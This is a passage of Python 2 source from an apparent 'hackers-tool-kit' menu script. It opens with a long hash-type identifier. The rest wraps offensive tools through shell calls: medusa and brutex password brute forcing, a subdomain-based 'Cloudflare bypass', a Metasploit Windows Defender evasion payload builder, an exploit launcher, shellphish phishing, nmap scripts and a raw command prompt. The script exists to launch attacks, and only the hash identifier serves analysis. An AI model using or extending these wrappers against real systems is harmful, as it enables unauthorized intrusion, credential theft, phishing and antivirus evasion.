jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + 